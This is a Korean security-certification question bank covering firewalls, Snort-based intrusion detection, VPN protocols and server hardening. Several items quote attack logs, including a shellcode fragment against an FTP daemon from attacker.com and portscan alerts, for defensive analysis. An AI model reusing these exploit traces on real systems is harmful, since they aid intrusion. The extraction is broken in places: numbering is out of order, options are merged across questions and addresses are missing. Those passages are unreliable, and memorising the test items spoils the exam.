있을 시에는 아이디와 패스워드가 프로그램 초 기 설정 값으로 설정되어있는지를 확인해야 한다. 3 만약 서비스를 위해 특별한 사용자 계정을 추가한 다면 이 계정이 보통의 로그인 계정으로 사용되도 록 한다. 4 특정 서비스를 위한 프로그램이 시작 단계 파일이 나 crontab 파일들에 어떤 것을 추가하지 않았는지 를 확인해야 한다 원격에서 클라이언트를 관리하는 툴인 PcAnywhere로 인하여 원격에서 접근할 수 있는 많은 취약점이 발생하고 있다. PcAnywhere를 위해 침입차 단시스템에서 접근제어를 해야 할 포트는? ,5632, TCP/UDP 2 3xxxx UDP 3 6xxx UDP 4 80 TCP 201. 내부 네트워크와 외부 네트워크 사이에 위치하여 외부에서의 침입을 1차로 방어해주며 불법 사용자의 침입차단을 위한 정책과 이를 지원하는 소프트웨어 및 하드웨어를 제공하는 것은? 1 IDS(Intrusion Detection System) 2 Firewall 3 Bridge 4 Gateway 202. 일반적으로 보안을 고려하여 라우터 혹은 침입차 단시스템에 설정하는 패킷필터링 (Packet Filtering) 규 칙에 어긋나는 것을 고르시오. 1 내부 네트워크에서 사용하는 IP를 가진 패킷만이 인터넷으로 나갈 수 있도록 설정한다. 2 DMZ에 위치한 베스천(Bastion) 호스트의 IP를 가진 패킷이 인터넷으로 나가는 것을 허용한다 3 보안 정책에 의해 정의되어 있지 않은 IP 주소의 사용은 모두 금지한다. 4 외부에서 DMZ의 서버들로 들어오는 패킷에 대해 서 제한을 두지 않는다. 156
157 203. 다음 중 일반적으로 침입차단시스템에서 필터링 을 하지 않고 허용하는 정책을 수립하게 되는 서비스 가 아닌 것은 무엇인가? 1 telnet 2 DNS 3 HTTP 4 SMTP 204. 다음 중 어플리케이션 레벨 침입차단시스템에 대 한 설명으로 틀린 것은 무엇인가? 1 패킷 필터링 방식에 비해 성능이 좋다. 2 사용자별로 접근제어가 가능하다. 3 기존 어플리케이션에 대한 수정이 불필요하다. 4 포괄적인 감사기록을 제공한다 다음 중 침입차단시스템 보안과 관련되어 가장 큰 보안 위협 요소는 무엇인가? 1 외부에 존재하는 해커 2 복잡한 설정으로 인한 잘못된 환경 설정(구성) 3 버퍼 오버플로우 공격 4 DDoS(분산서비스거부)공격 206. 침입차단시스템은 기능에 따라 패킷 필터링 방식 과 어플리케이션 프락시 방식으로 구분된다. 패킷 필 터링 방식과 프락시 방식이 동작하는 OSI 계층에 대한 설명으로 올바른 것은 무엇인가? 1 3계층, 7계층 2 3계층, 4계층 3 5계층, 7계층 4 4계층, 7계층 207. 패킷 필터링의 단점인 세션(session)에 대한 추적 기능을 보완한 침입차단시스템으로 기존 패킷 필터링 기능에 세션 추적 기능을 추가하여 일련의 네트워크 서비스의 순서를 추적하여 순서에 위배되는 패킷들은 모두 차단하게 되는 방식의 침입차단시스템은 무엇인 가? 1 Stateful Inspection 침입차단시스템 2 하이브리드 게이트웨이(Hybrid Gateway) 3 응용 게이트웨이(Application Gateway) 4 서킷 레벨(Circuit Level)침입차단시스템 208. 침입탐지시스템을 오용(misuse) 탐지와 비정상행 위(anomaly) 탐지로 나눠볼 때, 오용 탐지에 비해 비 정상행위 탐지의 특징으로 볼 수 있는 것은? 1 공격으로 알려진 이벤트의 특징을 기초로 침입을 탐지한다. 2 현재 대부분의 상용제품이 여기에 해당한다. 3 상대적으로 오판율이 낮다. 4 새로운 형태의 침입을 탐지할 수 있다 침입탐지시스템(IDS)에서 False Positive란 말이 뜻하는 것은 무엇인가? 1 공격이 분명한데도 탐지하지 못하는 것 2 공격이 아닌데 공격으로 인식하는 것 3 공격에 대해 로그를 남기는 것 4 특정 공격을 전혀 다른 공격으로 인식하는 것 210. 침입탐지시스템에 대한 설명으로 틀린 것을 고르 면? 1 침입탐지시스템은 기능이 막강하므로 침입차단시스 템 없이 단독으로 설치하더라도 강력한 보안기능 을 할 수 있다. 2 침입탐지 모델 기반은 크게 호스트기반의 침입탐지 시스템과 네트워크 기반의 침입탐지시스템으로 나 뉜다. 3 네트워크 기반의 침입탐지시스템은 네트워크 패킷 을 수집하여 헤더 및 데이터필드를 분석하여 공격 패턴을 점검한다. 4 오용 침입탐지는 알려진 침입패턴과 비교하여 일치 하면 공격시도로 간주한다 침입탐지시스템에 대한 설명으로 옳은 것은? 1 침입의 대상이 되는 시스템의 사용 및 오남용을 감 지한다. 2 내부 사용자에 의한 공격을 통제할 수 있다. 3 외부 사용자에 의한 접근을 사전에 차단할 수 있 다. 4 침입차단시스템과 같은 로그 기능은 가지고 있지 않다. 157
158 212. 다음 중 침입탐지시스템을 설치한 후 시스템을 이용한 보안 대응 방법 중 옳지 않은 것은? 1 침입탐지 시스템 로그 모니터링 2 침해사고에 대한 대응 3 침해사고 방지 대응 4 침해사고 완벽방지 설정 213. 다음은 다양한 보안대책을 기술한 것이다. 침입 (Intrusion)을 탐지하는데 가장 적절한 것은 무엇인가? 1 사용자의 등록과 권한은 승인된 절차에 따라 부여 한다. 2 워크스테이션을 일정 시간동안 사용하지 않는 경우 자동으로 접속이 끊어지도록 한다. 3 정해진 횟수의 시도가 성공하지 못할 때 자동으로 접속이 끊어지도록 한다. 4 보안 관리자는 로그파일을 점검하여 성공하지 못한 로그온 시도를 점검한다 침입탐지시스템은 침입차단시스템과 함께 보안 구성에 가장 기본적인 장비이다. 패턴 매칭 방식의 침 입탐지시스템이 수행하는 기능에 대한 설명 중 적절하 지 않은 것은? 1 감사기능과 탐지기능을 수행한다. 2 네트워크상의 의심스런 트래픽을 찾아낸다. 3 관리콘솔에 침입감지 경고신호를 보내서 네트워크 로부터 감지되는 침입자를 제어한다. 4 알려지지 않은 공격 패턴 분석하여 접근을 제한한 다 공개 소프트웨어 중에서도 활용 가능한 침입차단 시스템들이 많다. 그 중에서 가장 대표적인 공개 침입 탐지시스템에서 아래와 같은 침입 탐지 로그를 얻은 것이다. 아래의 로그를 남기는 공개소프트웨어는 아래 에서 고르면? Nov 7 23:11:06 lisa xxx[1260]: RPC Info Query: :963 -> :111 Nov 7 23:11:31 lisa xxx[1260]: spp_portscan: portscan status from : 2 connections across 1 hosts: TCP(2), UDP(0) Nov 7 23:11:31 lisa xxx[1260]: IDS08 - TELNET - 데몬 -active: :23 - > :1209 Nov 7 23:11:34 lisa xxx[1260]: IDS08 - TELNET - 데몬 -active: :23 - > :1210 Nov 7 23:11:47 lisa xxx[1260]: spp_portscan: portscan status from : 2 connections across 2 hosts: TCP(2), UDP(0) Nov 7 23:11:51 lisa xxx[1260]: IDS15 - RPC - portmap-request-status: :709 -> :111 Nov 7 23:11:51 lisa xxx[1260]: IDS362 - MISC - Shellcode X86 NOPS-UDP: :710 -> :871 1 nmap 2 tcpdump 3 portscan 4 snort 216. 침입탐지시스템은 promiscuous 모드에서 공격을 탐지할 수 있다. Switched 네트워크 환경에서 침입탐 지 시스템을 운영하기 위해 사용되는 장치는 다음 중 무엇인가? 1 Router 2 TAP(Splitter) 3 honeypots 4 decoy 217. 침입탐지시스템(Intrusion Detection System)은 침 입의 패턴 데이터베이스와 엑스퍼트시스템(Expert System)을 사용해 네트워크나 시스템의 사용을 실시간 모니터링하고 침입으로부터 해당 시스템을 보호한다. 다음 침입탐지시스템을 설명한 것으로 옳지 않은 것 은? 1 내 외부에서 접속하는 사용자의 해킹 및 불법적인 행동에 대응한다. 2 접속하는 IP에 상관없이 침입이라고 판단되는 접속 은 탐지한다. 3 인증된 IP 도용을 통한 내부공격자의 침입은 차단 할 수 없다. 4 시스템 침입이 발견되면 침입에 대한 정보를 관리 자에게 즉시 통보한다. 158
159 218. 보안 툴 Snort의 기능을 모두 고르면? 가) 스니퍼(Sniffer) 나) 침입차단시스템(FireWall) 다) 침입탐지시스템(IDS) 라) Packet logger 1 다 2 가,다 3 가,나,다 4 가,다,라 222. 다음 중 침입탐지시스템의 특징으로 보기 힘든 것은 어느 것인가? 1 외부로부터의 공격뿐만 아니라 내부자에 의한 해킹 도 탐지할 수 있다. 2 접속하는 IP에 상관없이 침입을 탐지할 수 있다. 3 패킷의 유형에 따라 통과가 허용 또는 거부되는 패 킷 필터링 기능을 제공한다. 4 침투경로 추적을 위한 로그를 제공한다 침입탐지시스템은 구현방법이나 탐지하는 침입의 종류에 따라 구분할 수 있다. 다음 중 그 구분방법이 틀린 것을 고르면? 1 호스트기반 침입탐지시스템 2 네트워크기반 침입탐지시스템 3 오용 침입탐지시스템 4 하이브리드 침입탐지시스템 220. 침입탐지시스템은 모니터링 대상에 따라 호스트 기반과 네트워크 기반으로 나눌 수 있다. 다음 중 호 스트 기반 침입탐지시스템의 특징이 아닌 것은? 1 네트워크의 트래픽 모니터링 2 시스템 파일의 무결성 점검 3 의심스러운 프로세스 탐지 4 호스트의 in-out 트래픽 모니터링 221. 침입탐지시스템 snort에서 다음과 같이 ICMP Echo Request 없이 Echo Reply만 반복되는 로그를 발 견하였다. 이에 대하여 다양한 원인 분석이 가능한데, 다음 중 가장 타당하지 않은 내용은? reply.com > : icmp: echo reply reply.com > : icmp: echo reply... reply.com > : icmp: echo reply reply.com > : icmp: echo reply 1 reply.com이 속한 네트워크의 MTU가 가 속한 네트워크의 MTU보다 클 것 이다. 2 누군가 를 스푸핑(spoofing)해서 ICMP Echo Request를 reply.com에 보냈을 것이다. 3 TFN(Tribe Flood Network)은 ICMP로 통신하므로 가 TFN 데몬일 수 있다. 4 ICMP 통신을 하는 loki(covert channel용 해킹도구) 클라이언트와 loki 서버간의 통신일 수 있다 아래는 공개용 침입탐지시스템인 snort의 로그 내용 중 일부이다. 아래 내용을 분석한 것 중 틀린 것 은? [**] EXPLOIT x86 NOOP [**] 03/27-01:38: attacker.com:2561 -> victim.com:21 TCP TTL:63 TOS:0x0 ID:8846 IpLen:20 DgmLen:558 DF ***AP*** Seq: 0x76E783D2 Ack: 0x499461D5 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: PASS 중략 C 89 F3 8D 4E 08 8D 56 0C B0.F...N..V.RQSS. 3B CD C0 31 DB B0 01 CD 80 E8 84 FF ;..1.1.SS... FF FF FF FF FF E E 2E bin0sh E 67 6C 69 6E 0D 0A 1venglin.. 1 FTP 데몬의 site exec 버그를 이용한 공격이다. 2 위와 같은 내용의 로그는 snort의 alert 파일에서 발견된다. 3 FTP 데몬에 대한 Race Condition 기법을 사용하였 다. 4 snort에서는 위의 공격에 대하여(false-positive가 아 닌) 정상적으로 탐지하였다 침입탐지시스템은 비정상적인 패킷을 공격으로 탐지하는데, 다음 중 공격으로 탐지해야 하는 패킷이 아닌 것은? 1 TCP 113(identd)으로 가는 SYN 패킷 2 SYN, FIN 플래그가 동시에 설정된 패킷 3 TCP 139(NetBios)로 가는 OOB(Out Of Band) 플래 그 설정 패킷 4 데이터 필드에 /cgi-bin/php.cgi? 159
160 225. 침입탐지시스템 자체에 대한 공격 기법으로 Insertion 공격, Evasion 공격, 서비스 거부 공격 등이 사용된다. 이 중 Insertion 공격에 대한 설명으로 틀린 것은? 1 Insertion 공격은 공격목표시스템이 받아들이는 패 킷을 침입탐지시스템이 거부하게 하는 기법이다. 2 Insertion 공격은 침입탐지시스템이 패턴 매칭에 실 패하도록 만드는 것이다. 3 침입탐지시스템과 목표시스템은 서로 다른 데이터 의 흐름을 관찰하게 된다. 4 IP 또는 TCP 헤더 조작, 이더넷 주소 조작 등을 통 해서 가능하다 다음과 같은 기능을 수행하는 보안도구는 무엇인 가? - 사용자, 시스템 행동의 모니터링 및 분석 - 시스템 설정 및 취약성에 대한 감사 기록 - 알려진 공격에 대한 행위 패턴 인식 - 비정상적 행위 패턴에 대한 통계적 분석 1 침입차단시스템 2 침입탐지시스템 3 가상사설망(VPN) 4 공개키기반구조(PKI) 227. 침입탐지시스템을 도입하려고 할 때는 각 사이트 의 특성에 따른 다양한 요소들이 고려되어야 한다. 다 음 보편적인 고려사항 중 올바르지 않은 것은? 1 조직 내부에 설치된 서버, 네트워크 장비의 대수, 종류, 위치 등 2 조직의 보안 정책 3 관리자의 개입을 필요로 하지 않는 자동화된 대처 4 예산 및 인력의 한계 228. 네트워크 기반 침입탐지시스템을 설치하였을 때 (하이브리드 침입탐지시스템이 아닌 경우), 다음 중 침 입여부를 탐지할 수 있는 상황을 고르면? 1 전체를 암호화한 패킷이 통과할 때 2 탐지 센서의 속도를 넘어선 고속 네트워크 상황 3 미러링 포트를 지원하지 않는 스위치 네트워크 상 황 4 안티바이러스 소프트웨어와 침입탐지시스템이 동시 에 설치된 경우 229. 다음 중 침입탐지시스템 도입 시 고려해야 할 사 항을 모두 고르면? A. 침입탐지율/침입오판율 B. CPU/메모리 등 자원사용량 C. 대량 세션 처리 능력 D. 보고기능 1 A, B 2 A, C 3 A, C, D 4 A, B, C, D 230. 네트워크에 대한 공격에는 소극적인(Passive) 공 격과 적극적인(Active) 공격이 있다. 이 두 공격에 대한 설명으로 틀린 것은 무엇인가? 1 적극적인 공격은 시스템의 취약성을 이용하여 시스 템을 변경하거나 수정하는 가시적인 위협이다. 2 소극적인 공격은 단순히 네트워크를 통해 전송되는 정보를 지켜보는 위협이다. 3 적극적인 공격은 탐지를 하여도 교정할 수 없다. 4 소극적인 공격은 상대적으로 탐지하기 어렵다 TCP 프로토콜은 연결이 시작되고 있는지, 종료되 고 있는지 또는 높은 우선순위를 갖고 패킷들이 전송 되고 있는지 등에 관한 다양한 플래그(Flag)를 사용한 다. 많은 공격 패킷들이 이러한 TCP 플래그들을 이용 하여 조작되어 진다. 뿐만 아니라 TCP 플래그의 조작 된 패킷을 통하여 Firewall이나 IDS에 의하여 패킷들의 탐지를 어렵게 한 다. 다음 중 TCP 패킷의 비정상적인 플래그 조합은 무 엇인가? 1 SYN.ACK 2 FIN 3 RST. ACK 4 SYN 232. 다음은 침입탐지시스템에 대한 설명이다. 적절하 지 않은 것은 무엇인가? 1 IDS가 침입차단 시스템 바깥쪽에 위치하고 있으면 오판 가능성이 높아지게 되어 잦은 경보(Alarm)을 발생시키게 된다. 2 중요 부서 및 DMZ 구역에 별도의 IDS를 두는 것 이 IDS의 효율을 높이는데 도움이 된다. 3 네트워크 기반과 호스트 기반의 IDS로 구분할 수 있다. 4 IDS를 내부 중요 부서가 위치한 곳에 설치하더라도 내부자간 발생되는 트래픽의 침입 탐지는 불가능 하다. 160
161 233. 다음 중 침입탐지시스템의 운용 시 발생될 수 있 는 문제점이 아닌 것은 무엇인가? 1 개인정보 침해 가능성이 존재한다. 2 암호화 패킷 분석 시 적절한 분석이 어렵게 된다. 3 IDS 우회 공격을 실시할 경우 탐지가 어려운 상황 이 발생한다. 4 내부자에 의한 위협은 탐지가 불가능하다 다음 중 VPN(Virtual Private Network: 가상 사설 네트워크)과 관련이 있는 프로토콜을 모두 고르시오. 가. PGP(Pretty Good Privacy) 나. L2F(Layer 2 Forwarding) 다. L2TP(Layer 2 Tunneling Protocol) 라. PPTP(Point-to-Point Tunneling Protocol) 마. MPPE(Microsoft Point-to-Point Encryption) 1 가, 나, 다 2 가, 라, 마 3 나, 다, 라, 4 나, 다, 라, 마 3 확장성과 유연성 제공 : 인터넷을 사용함으로써 지 역적인 위치에 제한 없이 신규 네트워크를 확장시 킬 수 있다. 4 QoS(Quality of Service)의 보장 : 인터넷과 같은 공 중망을 이용하기 때문에 대역폭이 보장된다 보안적 측면의 VPN(Virtual Private Network)의 요소 기술과 거리가 먼 것은? 1 터널링 기술(Tunneling) : 공중망에서 전용선과 같 은 보안 효과를 얻기 위한 기술 2 키 관리 기술(Key Management) : 보안을 강화하기 위하여 안전한 키 생성과 키 교환방식에 대한 기 술 3 침입탐지 기술(Intrusion Detection) : 서버에 대한 침입을 판단하여 서버의 접근 제어를 하는 기술 4 인증 기술(Authentication) : 접속 요청자의 적합성 을 판단하기 위한 인증 기술 235. 인터넷 또는 허용된 네트워크에 보안 기능을 제 공하여 두 네트워크단의 인가된 네트워크를 형성하는 방법으로, 터널링이나 인증기술을 필요로 하는 방법 은? 1 PGP (Pretty Good Privacy) 2 SET (Secure Electronic Transaction) 3 X VPN (Virtual Private Network) 236. 가상 사설 네트워크 VPN(Virtual Private Network)에서 제공되어 지는 보안 서비스로 옳은 것 을 모두 고르면? 1 내부 네트워크에 대한 접근 제어 2 데이터의 암호화 제공 3 TCP/IP에 대한 취약점 보안 4 데이터의 무결성 제공 237. 기업이 보안적 측면의 가상사설망(VPN: Virtual Private Network)을 도입함으로써 얻을 수 있는 일반 적 장점이 아닌 것은? 1 비용절감 효과 : 전용선 대신 인터넷을 이용하여 비용 절감을 할 수 있다. 2 보안성 제공 : 재택근무자, 지원 부서, 영업사원 등 의 외부 근무자에게도 충분한 보안성을 보장할 수 있다 아래는 VPN(Virtual Private Network)의 IPSEC(Internet Protocol Security)과 PPTP(Point to Point Tunneling Protocol), L2TP(Layer 2 Tunneling Protocol)의 차이점을 말하고 있다. 다음 중 틀린 것 은? 1 IPSEC은 PPTP와 L2TP과 달리 패킷 인증과 패킷 암 호화를 제공한다. 2 IPSEC은 PPTP와 L2TP과 달리 키 관리를 제공한다. 3 IPSEC은 OSI Layer 3에서, PPTP와 L2TP는 Layer 2 에서 동작한다. 4 IPSEC은 TCP/IP, IPX, AppleTalk, NetBEUI 등 다양 한 통신 프로토콜을 지원하는 반면, PPTP와 L2TP 는 TCP/IP만을 지원할 수 있다 TCP/IP 기반의 개방형 네트워크인 인터넷에서 한 네트워크에서 다른 네트워크로 이동하는 모든 데이터 정보를 암호화하며 사설망 기능을 제공하기 위해 도입 된 기술은 무엇인가? 1 VLAN(Virtual Local Area Network) 2 VLSM(Virtual Length Subnet Mask) 3 VPN(Virtual Private Network) 4 VPDN(Virtual Private Dial-up Network) 161
162 241. VPN을 구성하는 터널링 프로토콜에서 PPTP에 대 한 설명이 잘못된 것은? 1 [IP header] [GRE header] [PPP] [IP] [TCP/UDP] [DATA]로 구성되어 있다. 2 PPP 데이터 터널링을 위해 TCP를 기반으로 하는 GRE Header를 사용한다. 3 데이터는 PPTP의 MPPE(Microsoft Point-to-Point Encryption)에 의해 암호화된다. 4 원격 접속을 지원하며 패킷 인증 및 암호키 관리를 제공한다 VPN 터널링 기술은 데이터 및 사용자 정보를 인 터넷에서 가상 파이프를 통해 전달하도록 하는 것이 다. 다음 터널링 기술을 설명한 것 중 올바르지 않은 것은? 1 라우터 기반의 VPN 인프라는 안정적인 확장성을 제공한다. 2 원격에 있는 목적지 네트워크로 직접 접속한 것과 같은 기능을 제공한다. 3 터널링을 지원하는 네트워크 장치로는 라우터와 Firewall 등이 있다. 4 Multi-casting 및 Mobile IP에서도 사용된다 VPN에서 보안을 제공하기 위해 가장 기본이 되 는 기술이 터널링 기술이다. 이 터널링 기술은 데이터 및 관련 사용자정보 스트림이 인터넷에서 가상의 파이 프를 통해 전달되도록 구현한다. 이러한 터널링은 터 널을 초기화하는 종단장치의 특성에 따라 두 가지로 구분되는데 보안 게이트웨이 기능을 갖춘 PC 또는 네 트워크 장치(라우터, Firewall)가 있다. 이 두 가지 타입 의 터미널을 이용하여 구현할 수 있는 터널링 방식으 로 무엇이 있는가? 244. 가상사설망(VPN)에서 사용하는 IPSEC 프로토콜의 주요 요소로 ESP(Encapsulating Security Payload), AH(Authentication Header)가 있다. 다음 중 ESP에 대 한 설명으로 올바르지 않은 것은 무엇인가? 1 MD5와 같은 Message Checksum을 사용한다. 2 데이터 기밀성(Encryption)을 제공한다. 3 데이터 근원지 인증 제공(Authentication Data) 4 DES-CBC/3DES 등의 암호화 알고리즘을 활용한다 원격접속 VPN 사용자는 고정된 위치가 아닌 이 동이 가능한 사용자로, 초기 VPN 접속을 시도할 때 보안서버로부터 인증을 받아야 한다. 이를 위한 방식 으로 상호 독립적인 Peer-Peer 방식과 주종의 관계를 갖는 Client-Server 방식이 있다. Peer-Peer방식은 독립 적인 2 개의 호스트 간에 요청 및 응답을 통한 사용자 인증을 수행하는 방식인데 Peer-Peer방식 중 three-way handshaking 방식으로 인증서버는 호스트 로 challenge 메시지를 보내면, 호스트는 보안을 위해 해쉬 함수를 사용하여 계산한 값을 보내고 그런 다음 인증서버는 값이 일치하면 인증하는 형식을 가지는 인 증 방법을 무엇이라 하는가? 1 RADIUS 2 PAP(Password Authentication Protocol) 3 CHAP(Challenge Handshake Authentication Protocol) 4 TACACS 246. 다음 중 안전한 VPN 연결을 위해 가장 적합한 프로토콜로 짝지어진 것은 무엇인가? 1 S/MIME and SSH 2 TLS and SSL 3 IPSEC and L2TP 4 PKCS#10 and X Client-to-Server Tunneling, Host-by-Host Tunneling 2 Host-by-Host Tunneling, LAN-to-LAN Tunneling 3 LAN-to-LAN Tunneling, Hybrid Tunneling 4 Host-by-Host Tunneling, Hybrid Tunneling 162
163 247. 아파치 웹서버에서 보통 httpd 로그는 /var/log/httpd/apache 디렉터리에 저장된다. 아래 보 기는 HTTP에 대한 접근 로그 파일의 일부분이다. 이에 대한 설명으로 옳지 않은 것은? [01/Jul/2002:13:09: ] "GET / HTTP / 1.0" [01/Jul/2002:13:09: ] "GET / HTTP / 1.0" [01/Jul/2002:13:09: ] "GET /mmback.gif HTTP / 1.0" [01/Jul/2002:13:09: ] "GET /mmback.gif HTTP / 1.0" [01/Jul/2002:13:09: ] "GET /head.gif HTTP / 1.0" [01/Jul/2002:13:09: ] "GET /head.gif HTTP / 1.0" 누가, 언제, 어떻게 서버에 접속을 했는지에 대한 정보를 저장하는 access_log 파일이다 은 방문객의 IP 주소로 볼 수 있다. 3 'GET/HTTP/1.0' 혹은 'POST/HTTP/1.0'은 클라이언트 의 명령과 요구를 보여주고 있다. 4 각 로그 마지막부분은 HTTP 상태코드로서 404는 클라이언트는 승인 없이 데이터 접근을 시도했다 249. 리눅스 시스템에서 파일 및 파일 시스템은 가장 중요하게 보호해야 할 자산 중의 하나로 볼 수 있다. 어느 학교에서 공개 자료를 위한 별도의 파티션에 저 장되어 있는 공개(public) FTP 서버를 운영하고 있다고 한다. 아래 내용은 학교 리눅스 FTP시스템의 /etc/fstab파일에 대한 내용을 보여주고 있다. 파티션의 마운트 옵션 'defaults'에 대한 설명 중 옳지 않은 것 은? /dev/sda5 /public ext2 defaults 파일 시스템을 읽기/쓰기/실행 모드(rwx)로 마운트 시키는 것을 의미한다. 2 set-uid와 set-gid 비트가 작동하도록 하는 것을 의미한다. 3 파일 시스템상의 character/block 디바이스를 해석 하는 것을 의미한다. 4 시스템이 부팅되거나 mount 명령어가 -a 옵션과 함께 실행되면 파일시스템을 마운트 하는 것을 의 미한다 아파치 웹서버에서 보통 httpd 로그는 /var/log/httpd/apache 디렉터리에 저장된다. 아래 보 기는 HTTP에 대한 로그 파일의 일부분을 보여주고 있 다. 이에 대한 설명으로 옳지 않은 것은? [The Jul 1 12:03: ] [notice] Apache/1.3.1(유닉스) configured -- resuming normal operations [The Jul 1 13:09: ] [error] File does not exist:/home/html/mmback.gif [The Jul 1 13:09: ] [error] File does not exist:/home/html/mmback.gif [The Jul 1 13:10: ] [error] File does not exist:/home/html/mmback.gif [The Jul 1 13:09: ] [notice] httpd: caught SIGTERM, shutting down [The Jul 1 13:33: ] [notice] Apache/1.3.1 (유닉스) configured -- resuming normal operations 1 access_log로 접근에러에 대한 정보를 기록하는 에 러 메시지 로그파일이다. 2 notice, error는 에러의 종류를 나타낸다고 볼 수 있다. 3 로그부분 마지막에는 에러발생에 대한 원인, 서비 스, 취해진 행동을 볼 수 있다. 4 몇몇 로그 내용은 클라이언트의 요청에 따른 파일 을 찾지 못함과 시스템 shutdown한 흔적을 보여준 다 솔라리스 시스템에서 apache 웹서버를 사용하여 80번 포트로 서비스 중이다. 이 때 80번 포트에 대한 외부의 공격이 증가하고 있고 이 서버는 내부 업무용 이므로, 서비스 포트번호를 8000으로 바꾸려고 한다. 다음 중 수정해야 하는 파일은? (apache 설치 경로는 /usr/local/apache) 1 /etc/profile 2 /etc/rc.d/init.d/named 3 /usr/local/apache/bin/httpd 4 /usr/local/apache/conf/httpd.conf 251. DNS(Domain Name Service) 서버는 IP 주소와 호스트 이름의 매핑을 위해 53번 포트를 사용한다. 다 음 중 DNS 서버가 제공하는 기능과 이 때 사용하는 프로토콜이 맞게 짝지어진 것은? 1 클라이언트의 DNS 쿼리 - TCP, Zone Transfer - UDP 2 클라이언트의 DNS 쿼리 - UDP, Zone Transfer - TCP 3 클라이언트의 DNS 쿼리 - TCP, Zone Transfer - TCP 4 클라이언트의 DNS 쿼리 - UDP, Zone Transfer - UDP 163
164 252. 다음 중 전자우편 시스템과 가장 관련이 없는 것 은 어느 것인가? 1 PEM(Privacy Enhanced Mail) 2 PGP(Pretty Good Privacy) 3 X X DNS(Domain Name Server) 서버는 어떤 프로토 콜을 사용하는가? 1 TCP 2 UDP 3 TCP and UDP 254. DNS의 fdmax bug에 대해 틀린 것은? 1 remote 에서 공격이 가능하다. 2 buffer overflow 공격에 취약하다. 3 FD_SETSIZE보다 작은 값을 files 다음에 설정함으로 써 패치할 수 있다. 4 DoS에 취약하다 쿠키의 역할을 설명한 것이다. 다음 중 옳지 않은 것은? 1 이전에 접근했던 ip 주소를 기억하는 역할을 한다. 2 웹 서버가 웹 브라우저에게 보내어 저장했다가 서 버의 부가적인 요청이 있을 때 다시 서버로 보내 준다. 3 일정기간 동안만 유효하게 할 수 있고, 유효(만료) 기한이 설정되지 않을 경우 브라우저 종료 시 자 동 삭제된다. 4 HTTP Protocol에서 지원하는 사용자의 ip와 패스워 드만을 저장하는 기법 웹 서버를 안전하게 운영하기 위한 방안이 아닌 것은? 1 index.html 등의 파일이 없을 경우를 대비해 자동 디렉터리 리스트 기능을 사용한다. 2 웹 문서에서 symbolic link를 사용하지 않는다. 3 웹 서버의 프로세스 개수를 적절하게 제한한다. 4 웹 서버를 anonymous ftp와 함께 운영한다 DNS 서버를 안전하게 운영하는 방법이 아닌 것 은? 1 항상 최신의 버전을 사용한다. 2 chroot 환경에서 운영한다. 3 root 권한을 가지고 실행한다. 4 DNS 서비스를 제공하지 않는다면 프로그램을 제거 한다 웹상에서 각 서버는 외부로부터 들어오는 요청들 을 기다리는 HTTPD(HyperText Transfer Protocol Daemon)를 가진다. HTTP는 어떤 기반의 프로토콜인 가? 1 TCP 2 UDP 3 SMTP 4 SSL 260. 웹 서버가 파괴될 경우를 대비해서 여러 웹 서버 를 운영하기 위한 툴이 아닌 것은? 1 PGP 2 SLB 3 rdist 4 SSH 261. 다음 중 Windows에서 FTP 서버를 운영하는 방법 으로 적절치 않은 것은? 1 동시 연결 허용 수를 적절하게 설정한다. 2 사용자의 편의를 위해 익명 계정의 읽기/쓰기 권한 을 준다. 3 가능하다면 IPSec를 이용하여 전송되는 정보를 암 호화한다. 4 FTP 등록정보 중 디렉터리 보안 탭을 이용해 특정 IP를 차단할 수 있다 다음 중 안전한 웹 서버를 운영하는 것에 대해 올바르지 않은 것은? 1 웹 서버는 nobody 등의 권한 없는 사용자로 수행 한다. 2 웹 서버 디렉터리는 root 소유로 한다. 3 웹 서버의 설정, 로그, 실행 파일의 허가권은 755로 한다. 4 cgi-bin 디렉터리의 소유는 nobody로 한다 유닉스 시스템에서 FTP를 계정별로 사용할 수 없 도록 설정하는 파일은? 1 /etc/passwd 2 /etc/ftpusers 3 /var/adm/ftpusers 4 /bin/passwd 164
165 263. TFTP(Trivial File Transfer Protocol)는 패스워드 없이 FTP 접속이 가능한 프로그램으로 보안에 취약한 서비스이다. 이 서버에 대한 설명으로 잘못된 것은? 1 Diskless client 설치 시 주로 사용된다. 2 디렉터리 리스팅 기능을 사용하기 위해서는 미리 사용자 등록을 해야 한다. 3 TFTP 서비스를 사용하지 않을 경우 /etc/inetd.conf 파일에서 해당 서비스를 주석 처리한다. 4 설정이 잘못된 경우 누구나 파일 접근 권한이 설정 된다 안전한 웹서버를 만들기 위한 방법으로 옳지 않 은 것은? 1 같은 서버의 일반 사용자가 파일을 쓸 수 없도록 웹서버의 자식 프로세스는 루트 권한으로 실행한 다. 2 사용자의 입력(FORM, HIDDEN값 등의 변형)을 자 세히 검사한다. 3 CGI 프로그램은 가능한 컴파일 언어로 사용하고 권 한은 711로 한다. 4 Chroot를 사용하여 웹서버를 설치한다 웹서버 보안과 CGI(Common Gateway Interface) 보안 설정 중 옳지 않은 것은? 1 웹서버 실행 시 root 권한으로 실행되고, nobody 접근권한을 가지고 동작하도록 설정 2 효율적인 관리를 위해서 cgi-bin 디렉터리에 있는 디폴트 스크립트 삭제 3 스크립트 소스 노출 방지를 위한 퍼미션 접근제어 설정 4 FTP 접근 제어 설정 268. CGIWrapper에 대한 설명으로 옳지 못한 것은? 1 다른 사용자의 악의적인 공격을 부분적으로 막을 수 있다. 2 CGIWraper는 현재 CGI 프로그램의 사용자와 소유 자를 검사하여 실행 제한을 한다. 3 CGIWraper는 CGI 프로그램이 Root로 실행되는 것 을 막는다. 4 CGIWrapper를 사용하여도 악의적인 공격에 일부 파일은 손상 받을 수 있다 다음은 ftp 로그의 분석화면이다. 아래의 분석 결 과 중 옳지 않은 것은? wu-ftpd format exploit : /var/log/messages에 다음과 같 은 로그가 남음 Jun 21 16:29:23 testmachine ftpd[10342]: ANONYMOUS FTP LOGIN FROM Anonymous로 ftp 서비스에 대한 접근이 가능하다. 2 사용자 인증(Authentication)을 강화해야 한다 에서 Anonymous FTP 서버로 접속을 시도했다. 4 호스트 이름이 testmachine인 서버의 포트 로 접근했다 Bind 8.x 버전 이상에서 zone data에 대한 인증 과 검증을 위해 추가된 기능으로 올바른 것을 고르면? 269. 다음은 웹서버 로그 파일에서 볼 수 있는 상태코 드로 HTTP/1.1에서 정의한 내용이다. 짝지어진 내용 중 틀린 것은? OK Forbidden Not Found Internal Server Error 270. 다음 중 IIS(Internet Information Server) 서버를 관리하는 방법으로 적절치 않은 것은? 1 Administrator나 guest 같은 기본 계정은 삭제하거 나 변경한다. 2 